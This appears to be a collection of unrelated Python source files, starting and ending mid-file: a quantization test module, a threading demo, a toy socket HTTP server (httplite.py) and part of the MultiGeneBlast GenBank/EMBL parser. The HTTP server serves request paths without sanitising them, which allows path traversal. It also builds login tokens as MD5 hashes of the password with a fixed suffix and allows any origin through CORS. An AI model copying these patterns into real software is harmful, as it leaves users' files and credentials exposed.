assert all([bit in AutoQDescriptor.BITS for bit in final_bits])
def resnet18_desc(x: TestCaseDescriptor):
return x.config("resnet18_cifar10_mixed_int.json").sample(SampleType.CLASSIFICATION). \
mock_dataset('mock_32x32').batch(3).num_weight_quantizers(21).num_activation_quantizers(27)
def inception_v3_desc(x: TestCaseDescriptor):
return x.config("inception_v3_cifar10_mixed_int.json").sample(SampleType.CLASSIFICATION). \
mock_dataset('mock_32x32').batch(3).num_weight_quantizers(95).num_activation_quantizers(105)
def ssd300_vgg_desc(x: TestCaseDescriptor):
return x.config("ssd300_vgg_voc_mixed_int.json").sample(SampleType.OBJECT_DETECTION). \
mock_dataset('voc').batch(3).num_weight_quantizers(35).num_activation_quantizers(27)
def unet_desc(x: TestCaseDescriptor):
return x.config("unet_camvid_mixed_int.json").sample(SampleType.SEMANTIC_SEGMENTATION). \
mock_dataset('camvid').batch(3).num_weight_quantizers(23).num_activation_quantizers(23)
def icnet_desc(x: TestCaseDescriptor):
return x.config("icnet_camvid_mixed_int.json").sample(SampleType.SEMANTIC_SEGMENTATION). \
mock_dataset('camvid').batch(3).num_weight_quantizers(64).num_activation_quantizers(81)
TEST_CASE_DESCRIPTORS = [
inception_v3_desc(HAWQDescriptor()),
inception_v3_desc(HAWQDescriptor()).staged(),
resnet18_desc(HAWQDescriptor()),
resnet18_desc(HAWQDescriptor()).staged(),
resnet18_desc(HAWQDescriptor()).batch_for_init(2),
resnet18_desc(HAWQDescriptor()).batch_for_init(2).staged(),
ssd300_vgg_desc(HAWQDescriptor()),
ssd300_vgg_desc(HAWQDescriptor()).batch_for_init(2),
unet_desc(HAWQDescriptor()),
unet_desc(HAWQDescriptor()).batch_for_init(2),
icnet_desc(HAWQDescriptor()),
inception_v3_desc(AutoQDescriptor()).batch(2),
inception_v3_desc(AutoQDescriptor()).staged(),
resnet18_desc(AutoQDescriptor()).batch(2),
resnet18_desc(AutoQDescriptor()).batch(2).staged(),
resnet18_desc(AutoQDescriptor()).subset_ratio(0.2).batch(2),
resnet18_desc(AutoQDescriptor()).subset_ratio(0.2).staged(),
ssd300_vgg_desc(AutoQDescriptor()),
unet_desc(AutoQDescriptor()),
icnet_desc(AutoQDescriptor())
]
@pytest.fixture(params=TEST_CASE_DESCRIPTORS, ids=[str(d) for d in TEST_CASE_DESCRIPTORS])
def desc(request, dataset_dir):
desc: TestCaseDescriptor = request.param
config_path = desc.get_config_path()
with config_path.open() as file:
json_config = json.load(file)
json_config.update(desc.get_config_update())
desc.config = json_config
if desc.is_real_dataset:
desc.dataset_dir = Path(
dataset_dir if dataset_dir else os.path.join(tempfile.gettempdir(), desc.dataset_name))
return desc
def test_precision_init(desc: TestCaseDescriptor, tmp_path, mocker):
config_factory = ConfigFactory(desc.config, tmp_path / 'config.json')
args = {
"--data": str(desc.dataset_dir),
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": desc.batch_size,
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
}
command_line = " ".join(f'{key} {val}' for key, val in args.items())
# Mock SafeMLFLow to prevent starting an mlflow session that is never closed; this happens
# with a mocked train function because of a memory leak of config and SafeMLFLow
if desc.sample_type == SampleType.CLASSIFICATION:
import examples.classification.main as sample
mocker.patch("examples.classification.staged_quantization_worker.train_staged")
mocker.patch("examples.classification.main.train")
mocker.patch("examples.classification.main.SafeMLFLow")
mocker.patch("examples.classification.staged_quantization_worker.SafeMLFLow")
elif desc.sample_type == SampleType.SEMANTIC_SEGMENTATION:
import examples.semantic_segmentation.main as sample
mocker.patch("examples.semantic_segmentation.main.train")
mocker.patch("examples.semantic_segmentation.main.SafeMLFLow")
elif desc.sample_type == SampleType.OBJECT_DETECTION:
import examples.object_detection.main as sample
mocker.patch("examples.object_detection.main.train")
mocker.patch("examples.object_detection.main.SafeMLFLow")
desc.setup_spy(mocker)
sample.main(shlex.split(command_line))
desc.validate_spy()
|
threading_test.py
|
from __future__ import division, print_function
from threading import Thread, Lock
import numpy as np
import scipy.linalg as la
class aa(object):
def __init__(self, i):
self.i=i
def f(self, l, myarr):
myarr[self.i]=self.i
myarr[self.i+1]=self.i
l.acquire()
print('hello world {0:d}'.format(self.i))
l.release()
nbig = 1000
niter = 20
global_vect = np.random.random(nbig)
def do_lots(big_matrix):
for i in range(niter):
#aa = la.inv(big_matrix)
aa = np.linalg.inv(big_matrix)
retval = np.dot(np.dot(global_vect, aa),global_vect)
print('my retval {}'.format(retval))
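# Note: the matrix inversions above can genuinely overlap across threads because NumPy
# typically releases the GIL while it is inside the underlying LAPACK/BLAS routines;
# the pure-Python bookkeeping in this script still runs one thread at a time.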
if __name__ == '__main__':
myarr = [0,0,0,0,0,0,0,0,0,0,0]
lock = Lock()
ps = []
objs = []
for num in range(10):
objs.append(aa(num))
ps.append(Thread(target=objs[-1].f, args=(lock, myarr)))
ps[-1].start()
for num in range(10):
ps[num].join()
print(myarr)
#Matrix stuff
ps = []
nthreads=15
random_mat = np.random.random( (nthreads,nbig,nbig) )
for num in range(nthreads):
ps.append(Thread(target=do_lots, args=(random_mat[num],) ))
ps[-1].start()
for num in range(nthreads):
ps[num].join()
|
httplite.py
|
import socket,threading,os,time,json,hashlib
log = print
global STATIC_DIR
STATIC_DIR = ''
HEADER_CONTENT_TYPE = 'Content-Type:text/html; charset=UTF-8'
class Request():
def __init__(self, orign_request, addr):
self.path = None
self.method = None
self.signature = None
self.headers = dict()
self.body = None
self.orignal_request = orign_request
self.host, self.port = addr
self.__parse_request__(orign_request)
def __parse_request__(self, request):
twopart = [x for x in request.split('\r\n\r\n') if x]
self.__parse_headers_and_signature__(twopart[0])
if len(twopart) == 2:
self.body = twopart[1]
def __parse_headers_and_signature__(self, headers_part):
lines = headers_part.split("\r\n")
self.signature = lines[0]
for header in range(1, len(lines)):
if lines[header].startswith('Host'):
self.headers['Host'] = lines[header].split(":")[1:]
continue
item = lines[header].split(":", 1)  # split only on the first colon so header values may contain ':'
self.headers[item[0]] = item[1].strip()
self.method, self.path, *other = self.signature.split(' ')
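# Illustrative sketch (hypothetical request): parsing a minimal GET request.
#   req = Request('GET /index.html HTTP/1.1\r\nHost: localhost:9001\r\n\r\n', ('127.0.0.1', 54321))
#   req.method  -> 'GET'
#   req.path    -> '/index.html'
#   req.headers -> {'Host': [' localhost', '9001']}  (Host is kept as a list, other headers as strings)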
class Response():
def __init__(self, status=200, headers=None, body=None, message='ok', RESPONSE_FIRST_VERSION='HTTP/1.0'):
self.status = status
self.headers = headers if headers is not None else {}  # avoid a shared mutable default dict
self.body = body
self.message = message
self.RESPONSE_FIRST_VERSION = RESPONSE_FIRST_VERSION
@classmethod
def ok(cls, body=None):
res = Response(body=body)
res.body = body
if body:
res.headers['Content-Length'] = str(len(body))
return res
@classmethod
def bad_request(cls):
return Response(status=400, message='Bad Request')
def headers_responses(self):
signature = ' '.join([self.RESPONSE_FIRST_VERSION, str(self.status), self.message])
headers_str = str()
header_of_response = str()
for title, content in self.headers.items():
headers_str += ': '.join([title, content])+'\r\n'
headers_str = headers_str[:-2]
header_of_response += '\r\n'.join([signature, headers_str])+'\r\n\r\n'
return bytes(header_of_response, encoding='utf-8')
def data(self):
body = self.body
response = bytes('', encoding='utf-8')
if body:
response += body
return response
def is_json(myjson):
try:
json_object = json.loads(myjson)
except ValueError:
return False
return True
def read_file(filepath, type_):
with open(filepath, type_) as file:
result = file.read()
return result
def file(page) -> bytes:
path_ = os.path.join(STATIC_DIR, page)
if not os.path.exists(path_):
return read_file(os.path.join(STATIC_DIR, '404.html'), 'rb')
elif not os.access(path_, os.X_OK):
return b'403 Forbidden'
if os.path.isfile(path_):
body = read_file(path_, 'rb')
else:
body = read_file(path_+'/index.html', 'rb')
return body
def handle_get_request(request) -> Response:
path = request.path
if path == '/':
return Response.ok(body=file('index.html'))
return Response.ok(body=file(path[1:]))
def handle_post_request(request) -> Response:
headers = request.headers
path = request.path
body = request.body.split('\r\n')
datas = b'<h1>error<h1>'
if headers['Content-Type'].replace(' ', '') == 'application/json;charset=UTF-8' or headers['Content-Type'].replace(' ', '') == 'application/json;':
error_data = json.dumps({'status': 0, 'message': 'error'})
if path == '/login':
if is_json(body[0]):
# SQL query
json_data = json.loads(body[0])
token = hashlib.md5( bytes(json_data['username'] + json_data['password']+'passwords',encoding='utf-8') ).hexdigest()
success_data = json.dumps({'status': 1, 'message': 'success', 'token': token})
datas = success_data
else:
datas = error_data
datas = bytes(datas, encoding='utf-8')
if path == '/info':
if is_json(body[0]):
json_data = json.loads(body[0])
user_token = json_data['token']
user_name = json_data['username']
user_pwd = json_data['password']
token = hashlib.md5( bytes(json_data['username'] + json_data['password']+'passwords',encoding='utf-8') ).hexdigest()
if(user_token == token):
# do somethings
pass
return Response.ok(body=datas)
def method_not_support(method) -> Response:
try:
body = file('method_not_support.html')
return Response(405, body=body, message='Method %s Not Allowed' % method)
except FileNotFoundError as e:
return Response.bad_request()
def handle_request(request: Request) -> Response:
if request.method.lower() == 'get':
return handle_get_request(request)
elif request.method.lower() == 'post':
return handle_post_request(request)
elif request.method.lower() == 'options':
return Response.ok()
return method_not_support(request.method.lower())
def after_handle_response(response):  # CORS
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers["Access-Control-Allow-Headers"] = ("Content-Type,Content-Length, Authorization, Accept,X-Requested-With")
response.headers["Access-Control-Allow-Methods"] = "PUT,POST,GET,DELETE,OPTIONS"
def accept_socket(sock: socket, addr, REQUEST_MAX_LENGTH=1024 * 1024):
ori_request = sock.recv(REQUEST_MAX_LENGTH)
request = Request(ori_request.decode('utf-8'), addr)
response = handle_request(request)
after_handle_response(response)
response_bytes = response.data()
response_headers_bytes = response.headers_responses()
sock.send(response_headers_bytes)
sock.send(response_bytes)
sock.close()
log(' >>>>[INFO] '+time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) +
' Accept Connection %s:%s %s' % (addr[0], addr[1], request.signature,))
def start(host, port, static_dir='static'):
global _main
global STATIC_DIR
STATIC_DIR = static_dir
_main = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_main.bind((host, port))
_main.listen()
while True:
sock, addr = _main.accept()
threading.Thread(target=accept_socket, args=(sock, addr)).start()
if __name__ == "__main__":
start("0.0.0.0", 9001, 'static')
|
multigeneblast-3.py
|
#!/usr/bin/env python
## Copyright (c) 2012 Marnix H. Medema
## Department of Microbial Physiology / Groningen Bioinformatics Centre
## University of Groningen
## License: GNU General Public License v3 or later
## A copy of GNU GPL v3 should have been included in this software package in LICENSE.txt.
##Imported modules
import os
from os import system
import sys
import time
import multiprocessing
from multiprocessing import Process, freeze_support
import random
import fileinput
global GUI
global OUTBOX
global FRAME
global CURRENTDIR
global MGBPATH
global APPDATA
global TEMP
global DBPATH
#Find path to mgb files if run from another directory
pathfolders = os.environ['PATH'].split(os.pathsep)
pathfolders.reverse()
pathfolders.append(os.getcwd())
pathfolders.reverse()
CURRENTDIR = os.getcwd()
MGBPATH = ""
for folder in pathfolders:
try:
if "read_input_gui.py" in os.listdir(folder) and "guilib.py" in os.listdir(folder) and "empty.xhtml" in os.listdir(folder) and "multigeneblast.py" in os.listdir(folder) and "mgb_gui.py" in os.listdir(folder):
MGBPATH = folder
break
except:
pass
try:
if MGBPATH == "" and os.sep in sys.argv[0] and "read_input_gui.py" in os.listdir(sys.argv[0].rpartition(os.sep)[0]) and "guilib.py" in os.listdir(sys.argv[0].rpartition(os.sep)[0]):
MGBPATH = sys.argv[0].rpartition(os.sep)[0]
os.chdir(MGBPATH)
except:
pass
if MGBPATH == "":
print "Error: Please add the MultiGeneBlast installation directory to your $PATH environment variable before running the executable from another folder."
sys.exit(1)
#Find path to Application Data
if sys.platform == ('win32'):
APPDATA = os.environ['ALLUSERSPROFILE'] + os.sep + 'Application Data'
elif sys.platform == ('darwin'):
APPDATA = os.path.expanduser("~") + "/Library/Application Support"
else:
try:
if os.path.exists(os.getcwd() + os.sep + "multigeneblast_data"):
APPDATA = os.getcwd() + os.sep + "multigeneblast_data"
else:
os.mkdir(os.getcwd() + os.sep + "multigeneblast_data")
APPDATA = os.getcwd() + os.sep + "multigeneblast_data"
except:
try:
if os.path.exists(os.environ['HOME'] + os.sep + "multigeneblast_data"):
APPDATA = os.environ['HOME'] + os.sep + "multigeneblast_data"
else:
os.mkdir(os.environ['HOME'] + os.sep + "multigeneblast_data")
APPDATA = os.environ['HOME'] + os.sep + "multigeneblast_data"
except:
print "No permission to write to installation folder. Please change user or save somewhere else."
sys.exit()
if sys.platform == ('darwin') or sys.platform == ('win32'):
try:
os.mkdir(APPDATA + os.sep + 'MultiGeneBlast')
APPDATA = APPDATA + os.sep + 'MultiGeneBlast'
except:
if os.path.exists(APPDATA + os.sep + 'MultiGeneBlast'):
APPDATA = APPDATA + os.sep + 'MultiGeneBlast'
#Find path to temporary files
if sys.platform == ('win32'):
TEMP = os.environ['TEMP']
elif sys.platform == ('darwin'):
TEMP = os.environ['TMPDIR']
else:
try:
os.mkdir(os.environ['HOME'] + os.sep + ".mgbtemp")
TEMP = os.environ['HOME'] + os.sep + ".mgbtemp"
except:
TEMP = APPDATA
#Set other environment variables
os.environ['EXEC'] = MGBPATH + os.sep + "exec"
os.environ['PATH'] = os.environ['EXEC'] + os.pathsep + os.environ['PATH']
from pysvg.filter import *
from pysvg.gradient import *
from pysvg.linking import *
from pysvg.script import *
from pysvg.shape import *
from pysvg.structure import *
from pysvg.style import *
from pysvg.text import *
from pysvg.builders import *
from string import ascii_letters
import urllib2
from urllib2 import Request,urlopen,URLError,HTTPError
import httplib
from httplib import BadStatusLine,HTTPException
import urllib
import tarfile
import cPickle as pickle
from Tkinter import *
from tkMessageBox import askyesno, showerror
import shutil
class Options(dict):
"""Simple options access class, first step to use Optparse"""
def __init__(self, indict=None):
if indict is None:
indict = {}
dict.__init__(self, indict)
self.__initialized = True
def __getattr__(self, attr):
try:
return self.__getitem__(attr)
except KeyError:
raise AttributeError(attr)
def __setattr__(self, attr, value):
if not self.__dict__.has_key('_Options__initialized'):
return dict.__setattr__(self, attr, value)
elif attr in self:
dict.__setattr__(self, attr, value)
else:
self.__setitem__(attr, value)
##Functions necessary for this script
def get_sequence(fasta):
"""get the description and trimmed dna sequence"""
in_file = open(fasta, 'r')
content = in_file.readlines()
in_file.close()
content2 = []
for i in content:
if i != "":
content2.append(i)
content = content2
while content[0] == "" or content[0] == "\n":
content = content[1:]
header = content[0]
content = content[1:]
content = [x.rstrip() for x in content]
seq = "".join(content)
if ">" not in header or ">" in seq:
print >> sys.stderr, "FASTA file not properly formatted; should be single sequence starting with '>' and sequence name."
sys.exit(1)
return seq
def complement(seq):
complement = {'a': 't', 'c': 'g', 'g': 'c', 't': 'a', 'n': 'n', 'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}
complseq = []
for base in seq:
if base in complement.keys():
complbase = complement[str(base)]
complseq.append(complbase)
else:
complbase = 'n'
complseq.append(complbase)
return complseq
def reverse_complement(seq):
seq = list(seq)
seq.reverse()
revcompl = complement(seq)
revcomplstr = str()
for i in revcompl:
revcomplstr = revcomplstr + str(i)
return revcomplstr
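#Example (doctest-style, illustrative only):
# reverse_complement("ATGC") -> "GCAT"
# complement("ATGC") -> ['T', 'A', 'C', 'G'] (note: complement returns a list of bases, not a string)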
def fastaseqlengths(proteins):
names = proteins[0]
seqs = proteins[1]
seqlengths = {}
a = 0
for i in names:
seq = seqs[a]
seqlength = len(seq)
seqlengths[i] = seqlength
a += 1
return seqlengths
def parsegenes(genes):
genedict = {}
genelist = []
joinlist = []
joindict = {}
accessiondict = {}
locustagdict = {}
genenr = 0
for i in genes:
i = i.split(" gene ")[0]
join = "no"
genenr += 1
#Find gene location info for each gene
if "complement" in i.split("\n")[0].lower() and i.split("\n")[0][-1] == ")":
location = i.split("\n")[0]
elif "complement" in i.split("\n")[0].lower() and i.split("\n")[0][-1] != ")":
location = i.split(" /")[0]
while ")" not in location.replace(" ","")[-3:]:
locationlist = location.split("\n")
locationlist = locationlist[:-1]
location = ""
for locationpart in locationlist:
location = location + locationpart
location = location.replace("\n","")
location = location.replace(" ","")
elif "join" in i.split("\n")[0].lower() and i.split("\n")[0][-1] == ")":
location = i.split("\n")[0]
elif "join" in i.split("\n")[0].lower() and i.split("\n")[0][-1] != ")":
location = i.split("/")[0]
while ")" not in location.replace(" ","")[-3:]:
locationlist = location.split("\n")
locationlist = locationlist[:-1]
location = ""
for locationpart in locationlist:
location = location + locationpart
location = location.replace("\n","")
location = location.replace(" ","")
else:
location = i.split("\n")[0]
#location info found in embl file, now extract start and end positions
if "complement" in location.lower():
location = location.lower()
location = location.split("complement(")[1][:-1]
if "join(" in location.lower():
join = "yes"
location = location.lower()
location2 = location.split("join(")[1][:-1]
start = location2.split(",")[0]
start = start.split("..")[0]
start = start.replace("<","")
end = location2.split(",")[-1]
if ".." in end:
end = end.split("..")[1]
end = end.replace(">","")
joinedparts = location2.split(",")
joinedparts2 = []
for j in joinedparts:
newjoinedpart = j.replace("<","")
newjoinedpart = newjoinedpart.replace(">","")
joinedparts2.append(newjoinedpart)
else:
start = location.split("..")[0]
start = start.replace("<","")
end = location.split("..")[1]
end = end.replace(">","")
strand = "-"
else:
if "join(" in location.lower():
join = "yes"
location = location.lower()
location2 = location.split("join(")[1][:-1]
start = location2.split(",")[0]
start = start.split("..")[0]
start = start.replace("<","")
end = location2.split(",")[-1]
if ".." in end:
end = end.split("..")[1]
end = end.replace(">","")
joinedparts = location2.split(",")
joinedparts2 = []
for j in joinedparts:
newjoinedpart = j.replace("<","")
newjoinedpart = newjoinedpart.replace(">","")
joinedparts2.append(newjoinedpart)
else:
start = location.split("..")[0]
start = start.replace("<","")
end = location.split("..")[1]
end = end.replace(">","")
strand = "+"
if int(start) > int(end):
start2 = end
end2 = start
start = start2
end = end2
#Correct for alternative codon start positions
if "codon_start=" in i.lower():
codonstart = i.lower().split("codon_start=")[1][0]
if strand == "+":
start = str(int(start) + (int(codonstart) - 1))
elif strand == "-":
end = str(int(end) - (int(codonstart) - 1))
#Find gene name for each gene, preferably locus_tag, then gene, then protein_ID
a = 0
b = 0
genename = ""
nrlines = len(i.split("\n"))
while b == 0:
line = i.split("\n")[a]
if "protein_id=" in line:
genename = (line.split("protein_id=")[1][1:-1]).replace(" ","_")
genename = genename.replace("\\","_")
genename = genename.replace("/","_")
genename = genename.replace('"','')
b += 1
elif "protein_id=" in line.lower():
genename = (line.lower().split("protein_id=")[1][1:-1]).replace(" ","_")
genename = genename.replace("\\","_")
genename = genename.replace("/","_")
genename = genename.replace('"','')
b += 1
elif a == (nrlines - 1):
genename = ""
b += 1
else:
a += 1
if len(genename) > 1:
accnr = genename
else:
accnr = "no_accession_number_found"
#Find gene name or locus tag
a = 0
b = 0
while b == 0:
line = i.split("\n")[a]
locustag = ""
if "locus_tag=" in line:
locustag = (line.split("locus_tag=")[1][1:-1]).replace(" ","_")
locustag = locustag.replace("\\","_")
locustag = locustag.replace("/","_")
locustag = locustag.replace('"','')
b += 1
elif "locus_tag=" in line.lower():
locustag = (line.lower().split("locus_tag=")[1][1:-1]).replace(" ","_")
locustag = locustag.replace("\\","_")
locustag = locustag.replace("/","_")
locustag = locustag.replace('"','')
b += 1
elif a == (nrlines - 1):
if locustag == "":
locustag = "none"
b += 1
else:
a += 1
a = 0
b = 0
while b == 0:
line = i.split("\n")[a]
if "gene=" in line:
genename = (line.split("gene=")[1][1:-1]).replace(" ","_")
genename = genename.replace("\\","_")
genename = genename.replace("/","_")
genename = genename.replace('"','')
b += 1
elif "gene=" in line.lower():
genename = (line.lower().split("gene=")[1][1:-1]).replace(" ","_")
genename = genename.replace("\\","_")
genename = genename.replace("/","_")
genename = genename.replace('"','')
b += 1
elif a == (nrlines - 1):
if genename == "":
genename = "none"
b += 1
else:
a += 1
if locustag != "none":
locustagdict[accnr.rpartition(".")[0]] = locustag
if accnr == "no_accession_number_found" and locustag != "none":
accnr = locustag
genename = locustag
#Find sequence for each gene
a = 0 ###Not all gbks contain protein sequences as translations, therefore sequences from gene clusters are now extracted from the database at a later stage if sequence is not in gbk
b = 0
sequence = ""
while b < 2:
line = i.split("\n")[a]
if "translation=" in line:
sequence = line.split("translation=")[1][1:]
b += 1
a += 1
if line.count('"') > 1:
sequence = line.split("translation=")[1][1:-1]
b = 2
elif "translation=" in line.lower():
sequence = line.lower().split("translation=")[1][1:]
b += 1
a += 1
if line.count('"') > 1:
sequence = line.lower().split("translation=")[1][1:-1]
b = 2
elif a == (nrlines - 2) or a == (nrlines - 1):
sequence = ""
b = 2
elif b == 1:
if '"' in line:
seqline = line.replace(" ","")
seqline = seqline.split('"')[0]
sequence = sequence + seqline
b += 1
else:
seqline = line.replace(" ","")
sequence = sequence + seqline
a += 1
else:
a += 1
sequence = sequence.upper()
#Quality-check sequence
forbiddencharacters = ["'",'"','=',';',':','[',']','>','<','|','\\',"/",'*','-','_','.',',','?',')','(','^','#','!','`','~','+','{','}','@','$','%','&']
for z in forbiddencharacters:
if z in sequence:
sequence = ""
#Find annotation for each gene
a = 0
b = 0
while b == 0:
line = i.split("\n")[a]
if "product=" in line:
annotation = line.split("product=")[1][1:]
annotation = annotation.replace(" ","_")
if annotation[-1] == '"':
annotation = annotation[:-1]
b += 1
elif "product=" in line.lower():
annotation = line.lower().split("product=")[1][1:]
annotation = annotation.replace(" ","_")
if annotation[-1] == '"':
annotation = annotation[:-1]
b += 1
elif a == (nrlines - 1):
annotation = "not_annotated"
b += 1
else:
a += 1
accessiondict[genename] = accnr
if join == "yes":
joinlist.append(genename)
joindict[genename] = joinedparts2
#Remove illegal chars
illegal_chars = '''!"#$%&()*+,:;=>?@[]^`'{|} '''
genename = "".join([char for char in genename if char not in illegal_chars])
if len(genename) < 2:
genename = "orf" + "_" + str(genenr)
#Save data to dictionary
if len(genename) > 1:
genedict[genename] = [start,end,strand,annotation,sequence,accnr,genename]
genelist.append(genename)
return [genelist, genedict, joinlist, joindict, accessiondict, locustagdict]
def cleandnaseq(dnaseq):
dnaseq = dnaseq.replace(" ","")
dnaseq = dnaseq.replace("\t","")
dnaseq = dnaseq.replace("\n","")
dnaseq = dnaseq.replace("0","")
dnaseq = dnaseq.replace("1","")
dnaseq = dnaseq.replace("2","")
dnaseq = dnaseq.replace("3","")
dnaseq = dnaseq.replace("4","")
dnaseq = dnaseq.replace("5","")
dnaseq = dnaseq.replace("6","")
dnaseq = dnaseq.replace("7","")
dnaseq = dnaseq.replace("8","")
dnaseq = dnaseq.replace("9","")
dnaseq = dnaseq.replace("/","")
return dnaseq
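#Example (doctest-style, illustrative only): cleandnaseq strips whitespace, digits and slashes,
#so a raw GBK/EMBL sequence block such as "    1 atgcatgc\n   61 ggttaa//" becomes "atgcatgcggttaa".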
def extractprotfasta(genelist,genedict,dnaseq,rc_dnaseq,joinlist,joindict,accessiondict, locustagdict):
names = []
seqs = []
for i in genelist:
genename = i
if locustagdict.has_key(genename):
locustag = locustagdict[genename]
elif locustagdict.has_key(genename.partition(".")[0]):
locustag = locustagdict[genename.partition(".")[0]]
elif accessiondict.has_key(genename.partition(".")[0]) and locustagdict.has_key(accessiondict[genename].partition(".")[0]):
locustag = locustagdict[accessiondict[genename].partition(".")[0]]
elif accessiondict.has_key(genename) and locustagdict.has_key(accessiondict[genename]):
locustag = locustagdict[accessiondict[genename]]
else:
locustag = "no_locus_tag"
#If suitable translation found in gbk, use that
if len(genedict[i][4]) > 5:
protseq = genedict[i][4]
i = genedict[i]
#If no suitable translation found in gbk, extract from DNA sequence
else:
i = genedict[i]
y = int(i[0])
z = int(i[1])
if i[2] == "+":
if genename in joinlist:
geneseq = ""
for j in joindict[genename]:
partstart = int(j.split("..")[0])
if ".." in j:
partend = int(j.split("..")[1])
else:
partend = int(j)
geneseqpart = dnaseq[(partstart - 1):partend]
geneseq = geneseq + geneseqpart
else:
geneseq = dnaseq[(y - 1):z]
protseq = translate(geneseq)
elif i[2] == "-":
if genename in joinlist:
geneseq = ""
joinlistrev = joindict[genename]
joinlistrev.reverse()
for j in joinlistrev:
partstart = int(j.split("..")[0])
if ".." in j:
partend = int(j.split("..")[1])
else:
partend = int(j)
geneseqpart = rc_dnaseq[(len(rc_dnaseq) - partend):(len(rc_dnaseq) - partstart + 1)]
geneseq = geneseq + geneseqpart
else:
geneseq = rc_dnaseq[(len(rc_dnaseq) - z):(len(rc_dnaseq) - y + 1)]
protseq = translate(geneseq)
genedict[genename] = i[:-1] + [locustag]
name = "input" + "|" + "c1" + "|" + i[0] + "-" + i[1] + "|" + i[2] + "|" + genename + "|" + i[3] + "|" + i[5] + "|" + locustag
seqs.append(protseq)
names.append(name)
proteins = [names,seqs,genelist,genedict,accessiondict]
return proteins
def gbk2proteins(gbkfile):
try:
file = open(gbkfile,"r")
except:
print "Error: no or invalid input file: " + gbkfile
sys.exit(1)
filetext = file.read()
filetext = filetext.replace("\r","\n")
if " CDS " not in filetext or "\nORIGIN" not in filetext:
print >> sys.stderr, "Exit: GBK file not properly formatted, no sequence found"
sys.exit(1)
cdspart = filetext.split("\nORIGIN")[0]
#Extract DNA sequence and calculate reverse complement of it
dnaseq = filetext.split("\nORIGIN")[1]
dnaseq = cleandnaseq(dnaseq)
dnaseqlength = len(dnaseq)
rc_dnaseq = reverse_complement(dnaseq)
#Extract genes
genes = cdspart.split(" CDS ")
genes = genes[1:]
genesdetails = parsegenes(genes)
genelist = genesdetails[0]
genedict = genesdetails[1]
joinlist = genesdetails[2]
joindict = genesdetails[3]
accessiondict = genesdetails[4]
locustagdict = genesdetails[5]
#Locate all genes on DNA sequence and translate to protein sequence
proteins = extractprotfasta(genelist, genedict, dnaseq, rc_dnaseq, joinlist, joindict, accessiondict, locustagdict)
textlines = filetext.split("\n//")[0]
textlines = textlines.split("\n")
accession = ""
definition = ""
definitionfound = "n"
for i in textlines:
if accession == "":
if "LOCUS " in i:
j = i.split("LOCUS ")[1]
accession = j.split(" ")[0]
if len(accession) < 4:
accession = ""
if definition == "":
if "DEFINITION " in i:
j = i.split("DEFINITION ")[1]
definition = j
definitionfound = "y"
if definitionfound == "y":
if " " in i:
definitionfound = "n"
definition = definition + i.split(" ")[1]
else:
definitionfound = "n"
#Test if accession number is probably real GenBank/RefSeq acc nr
if testaccession(accession) == "n":
accession = ""
return [proteins, accession, dnaseqlength, definition]
def parse_dna_from_embl(embl_string):
"Parse DNA sequence from EMBL input"
seq_array = []
lines = embl_string.split('\n')
for line in lines:
if line.lower().find('sequence') > -1:
continue
line = line.strip()
line = line.rstrip('0123456789')
line = line.rstrip('/')
line = line.strip()
seq_array.append(line)
return "".join(seq_array)
def embl2proteins(emblfile):
try:
file = open(emblfile,"r")
except:
print "Error: no or invalid input file: " + emblfile
sys.exit(1)
filetext = file.read()
filetext = filetext.replace("\r","\n")
if "FT CDS " not in filetext or ("\nSQ" not in filetext):
log("Exit: EMBL file not properly formatted, no sequence found or no " \
"CDS annotation found.", exit=True)
cdspart = filetext.split("\nSQ ")[0]
#Extract DNA sequence and calculate reverse complement of it
dnaseq = parse_dna_from_embl(filetext.split("\nSQ ")[1])
dnaseq = cleandnaseq(dnaseq)
sequence = dnaseq
if (sequence.count('N') + sequence.count('n') + sequence.count('A') + sequence.count('a') + sequence.count('C') + sequence.count('c') + sequence.count('G') + sequence.count('g') + sequence.count('T') + sequence.count('t')) < (0.5 * len(sequence)):
log("Protein GBK/EMBL file provided. Please provide nucleotide " \
"GBK/EMBL file.", exit=True)
dnaseqlength = len(dnaseq)
rc_dnaseq = reverse_complement(dnaseq)
if dnaseqlength < 1:
log("No sequence found in GBK/EMBL file. Please provide an annotated " \
"nucleotide GBK/EMBL file with a DNA sequence.", exit=True)
#Extract genes
genes = cdspart.split("FT CDS ")
genes = genes[1:]
genesdetails = parsegenes(genes)
genelist = genesdetails[0]
genedict = genesdetails[1]
joinlist = genesdetails[2]
joindict = genesdetails[3]
accessiondict = genesdetails[4]
locustagdict = genesdetails[5]
#Locate all genes on DNA sequence and translate to protein sequence
proteins = extractprotfasta(genelist, genedict, dnaseq, rc_dnaseq, joinlist, joindict, accessiondict, locustagdict)
textlines = filetext.split("SQ ")[0]
textlines = textlines.split("\n")
accession = ""
definition = ""
for i in textlines:
if accession == "":
if "AC " in i:
j = i.split("AC ")[1]
j = j.replace(" ","")
accession = j.split(";")[0]
if len(accession) < 4:
accession = ""
if definition == "":
if "DE " in i:
j = i.split("DE ")[1]
definition = j
#Test if accession number is probably real GenBank/RefSeq acc nr
if testaccession(accession) == "n":
accession = ""
return [proteins, accession, dnaseqlength, definition]
def translate(sequence):
#Translation table standard genetic code; according to http://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi
transldict = { 'TTT': 'F', 'TCT': 'S', 'TAT': 'Y', 'TGT': 'C',
'TTC': 'F', 'TCC': 'S', 'TAC': 'Y', 'TGC': 'C',
'TTA': 'L', 'TCA': 'S', 'TAA': '*', 'TGA': '*',
'TTG': 'L', 'TCG': 'S', 'TAG': '*', 'TGG': 'W',
'CTT': 'L', 'CCT': 'P', 'CAT': 'H', 'CGT': 'R',
'CTC': 'L', 'CCC': 'P', 'CAC': 'H', 'CGC': 'R',
'CTA': 'L', 'CCA': 'P', 'CAA': 'Q', 'CGA': 'R',
'CTG': 'L', 'CCG': 'P', 'CAG': 'Q', 'CGG': 'R',
'ATT': 'I', 'ACT': 'T', 'AAT': 'N', 'AGT': 'S',
'ATC': 'I', 'ACC': 'T', 'AAC': 'N', 'AGC': 'S',
'ATA': 'I', 'ACA': 'T', 'AAA': 'K', 'AGA': 'R',
'ATG': 'M', 'ACG': 'T', 'AAG': 'K', 'AGG': 'R',
'GTT': 'V', 'GCT': 'A', 'GAT': 'D', 'GGT': 'G',
